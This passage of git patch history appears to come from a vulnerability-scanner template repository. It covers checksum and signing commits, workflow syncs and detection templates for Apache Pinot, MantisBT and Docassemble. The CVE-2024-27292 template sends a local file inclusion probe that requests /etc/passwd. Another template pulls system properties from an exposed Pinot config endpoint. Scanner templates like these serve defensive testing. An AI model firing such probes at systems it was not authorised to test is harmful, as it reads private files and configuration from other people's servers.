-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:0cfc0e3735eb1da659169fe227bd71d64179ee8b +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f0a69c5495e77c2239c46c7019250edb3a2982bc +http/technologies/wordpress/plugins/webp-express.yaml:eca47ae3852c045fcd314607bbdc88d3eaa510a1 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:f50ea67c8724e1f2dbe53faf45375fa13b1b0da1 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c786924a44be001e6fce85d595e24c93a99c7cc6 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5d5bf62c0b250554cbb5f93e7dcde37d86c97d58 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:d4b3d24c787103507e69e531df3f8a0e00526fe4 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:ea3b3295621adb8363b475bc6491b1995e20c2d4 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:a331299a39ae782c77f5de19b60ed6cfa91051eb +http/technologies/wordpress/plugins/woocommerce-payments.yaml:b6bf5864e2c68e95d85405d1286f3e45d527a4fa +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:0b7930c53dcc882bc1b7412caf3fa8b66b164211 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:cd5091c9e6ee0126a93b5d604d44d6795dd5203a +http/technologies/wordpress/plugins/woocommerce-services.yaml:05769605c732c4f1e02aea58e358f92849bb9f8b +http/technologies/wordpress/plugins/woocommerce.yaml:2d72bdd00a4cdb16ded3bfdad8f7801f346d7729 +http/technologies/wordpress/plugins/wordfence.yaml:442e37613c84d3d47a654770ab9b582c0403d7cc +http/technologies/wordpress/plugins/wordpress-importer.yaml:e201c138408bbc7ad3d7b61bee8f4770a42da522 +http/technologies/wordpress/plugins/wordpress-seo.yaml:10487a6aa674b683ab952ab331f85cd9384fb96d http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:0df8d691f466192c44b622742cc5e3c17a00a00e +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:832456356272859f3c8acff571031b39ce1c39c7 +http/technologies/wordpress/plugins/wp-file-manager.yaml:0921154713a5bd558db8e7da4e3de729e5d7140d +http/technologies/wordpress/plugins/wp-google-maps.yaml:5260d62b101878fcc2531c1856601e4e7a3b3fbf +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6613dcc99233b403ae7f1f0c316fdc4f3f3ed678 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:2824ce4b4efe0b107536cf455e2118c5c8ad1a26 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:b42f34127003dbb9fa45d09c3ce7d146338be1b0 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:b429a5a57936afc6f63bede3b054bba643df4ac3 +http/technologies/wordpress/plugins/wp-optimize.yaml:cf97fa9b78f80ca2d1a9786fe8f47783e6ff940d +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2054f7f76506747382e4c9aa9ec0edacfb9f4eb7 +http/technologies/wordpress/plugins/wp-reset.yaml:19bcc58b8c41afffb8ce1f0bab0c509fd06c36dd +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:b9bbe07931263bf596f8e29673798229f6cdf506 +http/technologies/wordpress/plugins/wp-rollback.yaml:262bd09571a418cdaaa54f01979933b30b554b54 +http/technologies/wordpress/plugins/wp-seopress.yaml:d44bcfd8c1527365b2745c18d5de0e6fa559debc +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:f26d9e2f1a96e63595709cf52049f720b4500f3e +http/technologies/wordpress/plugins/wp-smushit.yaml:a829f833ef204f8a9bbaa0f6a7559578e111de2d +http/technologies/wordpress/plugins/wp-statistics.yaml:943bb8c83d4ce8c1aaf53eceb5ab9644d5bcad0f +http/technologies/wordpress/plugins/wp-super-cache.yaml:ce4b9907460a249ad6fee48a2780bb9131ea25a5 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e0a0c1701421bf71be91f59716cb30526f98c215 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:2837da1ae3072b0da32f10789dd5aab0d39a466d +http/technologies/wordpress/plugins/wpforms-lite.yaml:72c7143bbeffd9e0d85d11bb02bc0c90c4d33b63 +http/technologies/wordpress/plugins/wps-hide-login.yaml:a1a68ac536eab88bab3379fcbb1803cdcaea4223 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:636d5b41ad8ac87a4f9c96cbee56eb54fecad3b3 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:60190f40e03f0df3d4603ccd39a721f0ae13a5a5 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8816,7 +8817,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c991712c61f88b144349a35e7e88926ac9501db1 +templates-checksum.txt:2f742023c09c3b8b513466321ca318fcf5368942 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 65839f0b70f380bb55cb4eedb2b23d530c854aa9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 09:59:11 +0000 Subject: [PATCH 0800/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e05fb131c0..dc9bd4bb64 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposed-panels/dialogic-xms-console.yaml' - 'http/exposed-panels/endpoint-protector-panel.yaml' + - 'http/exposures/backups/sql-server-dump.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' From a9a5ea4c8386bd22a5e2ce92c02cc2e27cf32736 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 10:00:29 +0000 Subject: [PATCH 0801/1841] Auto Template Signing [Tue Jul 2 10:00:29 UTC 2024] :robot: --- http/exposures/backups/sql-server-dump.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml index 3de7cceaa8..09d614837a 100644 --- a/http/exposures/backups/sql-server-dump.yaml +++ b/http/exposures/backups/sql-server-dump.yaml @@ -58,3 +58,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022072a945593a108233b78d522957d9af7d24b173838e3aa723b397c4f4022d4b490221009687a108664b7872ce93592d205de6492aac7b48f4c54e79705a5aba0a19976e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1f67112c1bdd7e9a2d7e1e55e6993e00aaaaad46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Jul 2024 15:36:30 +0530 Subject: [PATCH 0802/1841] minor update --- http/cves/2024/CVE-2024-27292.yaml | 24 +++++++++++++++--------- 1 file changed, 15 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-27292.yaml b/http/cves/2024/CVE-2024-27292.yaml index 753dd5c142..2ba32c4dcf 100644 --- a/http/cves/2024/CVE-2024-27292.yaml +++ b/http/cves/2024/CVE-2024-27292.yaml @@ -1,22 +1,30 @@ id: CVE-2024-27292 info: - name: CVE-2024-27292 + name: Docassemble - Local File Inclusion author: johnk3r severity: high - description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. + description: | + Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. reference: - https://tantosec.com/blog/docassemble/ - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv + - https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-27292 + cwe-id: CWE-706 + epss-score: 0.00043 + epss-percentile: 0.0866 metadata: verified: true - max-request: 2 + max-request: 1 shodan-query: http.title:"docassemble" - fofa-query: - - icon_hash="-575790689" - tags: lfi,docassemble,cve,cve2024 + fofa-query: icon_hash="-575790689" + tags: cve,cve2024,docassemble,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/interview?i=/etc/passwd" @@ -25,9 +33,7 @@ requests: matchers: - type: regex regex: - - "nobody:[x*]:65534:65534" - "root:.*:0:0:" - condition: or - type: status status: From c0a721cba9a660341b112517f098f9126844d160 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 12:05:04 +0000 Subject: [PATCH 0803/1841] Auto Generated New Template Addition List [Tue Jul 2 12:05:04 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4e1f098d74..399476ef7b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml +http/cves/2024/CVE-2024-27292.yaml http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml From f9df0622b25451ced69fed7058085a5453960cbb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 12:05:10 +0000 Subject: [PATCH 0804/1841] Auto Generated Templates Checksum [Tue Jul 2 12:05:10 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fc345326ae..5fae894c51 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3410,6 +3410,7 @@ http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d +http/cves/2024/CVE-2024-27292.yaml:8766a9ddb81c0c5be3dd8d9e74d7a3e109e160a0 http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 http/cves/2024/CVE-2024-27564.yaml:0b9367bff756ebc5d7db5a742305272ac13f37b1 @@ -4798,7 +4799,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11 http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce -http/exposures/backups/sql-server-dump.yaml:997c812c99f8659aad23a107014b5a6b7c63b2d6 +http/exposures/backups/sql-server-dump.yaml:1d9af95edd46caa15f831d5d4673ecfd1282de99 http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 @@ -8817,7 +8818,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2f742023c09c3b8b513466321ca318fcf5368942 +templates-checksum.txt:d2b9e94525d640557a10fce735fa729196ff3ac3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9c44d9419b168a37306ab98f43df5a097dc7addc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 12:05:57 +0000 Subject: [PATCH 0805/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index dc9bd4bb64..20d19fe9e0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' + - 'http/cves/2024/CVE-2024-27292.yaml' - 'http/cves/2024/CVE-2024-32709.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' From c354ca923413e15b5be27ff3669b82ead9c7284b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 12:06:51 +0000 Subject: [PATCH 0806/1841] Auto Template Signing [Tue Jul 2 12:06:51 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27292.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27292.yaml b/http/cves/2024/CVE-2024-27292.yaml index 2ba32c4dcf..8720f8b408 100644 --- a/http/cves/2024/CVE-2024-27292.yaml +++ b/http/cves/2024/CVE-2024-27292.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 501 +# digest: 4b0a00483046022100d8b89e9955181d9c42c128bf1113ced63499aabac72a131110385c0d688d14cd022100c3821f365b88c32e60e587c998e270a901c7bf42808ab259453168ca771c16d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 918c7bc7c42b977452b482dad20081d2407d4bb9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Jul 2024 19:34:35 +0530 Subject: [PATCH 0807/1841] Update mantisbt-anonymous-login.yaml --- http/default-logins/mantisbt/mantisbt-anonymous-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index e8b051662b..44c3ae1c1b 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -22,7 +22,7 @@ http: - type: word part: body words: - - 'user-info">anonymous"' + - '"user-info">anonymous' - 'My View' - 'Roadmap' condition: and @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201cd4fb8e5b9edfdabb9e51e1946d869a78dd98154c64ba176d3ea231e5ad3ae7022100dd971809685c9e08b8e5fe39100d2d2da8f722f1ab83022653d06091daae5ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cd4fb8e5b9edfdabb9e51e1946d869a78dd98154c64ba176d3ea231e5ad3ae7022100dd971809685c9e08b8e5fe39100d2d2da8f722f1ab83022653d06091daae5ca6:922c64590222798bb761d5b6d8e72950 From ba7054f06a80cb20f334b6e30a7dcfeb6270e8f2 Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Tue, 2 Jul 2024 15:14:44 -0300 Subject: [PATCH 0808/1841] Create apache-pinot-detect.yaml Detects a Apache Pinot web application, A realtime distributed OLAP datastore. --- .../apache/apache-pinot-detect.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/technologies/apache/apache-pinot-detect.yaml diff --git a/http/technologies/apache/apache-pinot-detect.yaml b/http/technologies/apache/apache-pinot-detect.yaml new file mode 100644 index 0000000000..41c6dd2dd6 --- /dev/null +++ b/http/technologies/apache/apache-pinot-detect.yaml @@ -0,0 +1,31 @@ +id: apache-pinot-detect + +info: + name: Apache Pinot - Detect + author: icarot + severity: info + description: | + Detects a Apache Pinot web application, A realtime distributed OLAP datastore. + classification: + cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: pinot + tags: tech,pinot,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Apache Pinot' + - 'Pinot Controller UI' + condition: and + - type: status + status: + - 200 From 48d25050a47c9cab9f6d78962fc6faee2b2b8f8f Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Tue, 2 Jul 2024 15:16:56 -0300 Subject: [PATCH 0809/1841] Create apache-pinot-config.yaml Detects if path Appconfigs of Apache Pinot web application is exposed, getting internal information about the configuration made. --- .../configs/apache-pinot-config.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/exposures/configs/apache-pinot-config.yaml diff --git a/http/exposures/configs/apache-pinot-config.yaml b/http/exposures/configs/apache-pinot-config.yaml new file mode 100644 index 0000000000..1f68234267 --- /dev/null +++ b/http/exposures/configs/apache-pinot-config.yaml @@ -0,0 +1,40 @@ +id: apache-pinot-config + +info: + name: Apache Pinot - Exposure + author: icarot + severity: medium + description: | + Detects if path Appconfigs of Apache Pinot web application is exposed, getting internal information about the configuration made. + classification: + cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: pinot + tags: config,exposed,pinot,apache + +http: + - method: GET + path: + - "{{BaseURL}}/appconfigs" + + matchers-condition: and + matchers: + - type: word + words: + - 'systemConfig' + - 'runtimeConfig' + - 'pinotConfig' + - 'jvmConfig' + - 'systemProperties' + condition: and + - type: status + status: + - 200 + extractors: + - type: json + name: config + part: body + json: + - '.[].systemProperties."basedir",.[].systemProperties."user.home",.[].systemProperties."user.name",.[].systemProperties."user.dir",.[].systemProperties."app.home",.[].systemProperties."java.home",.[].systemProperties."java.runtime.version",.systemConfig.name,.[].systemProperties."os.version"' From a803ed0bbb5cd827773f78e7fcc725b074f5d0b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 00:19:28 +0000 Subject: [PATCH 0810/1841] Auto WordPress Plugins Update [Wed Jul 3 00:19:28 UTC 2024] :robot: --- helpers/wordpress/plugins/admin-menu-editor.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/breeze.txt | 2 +- .../wordpress/plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - 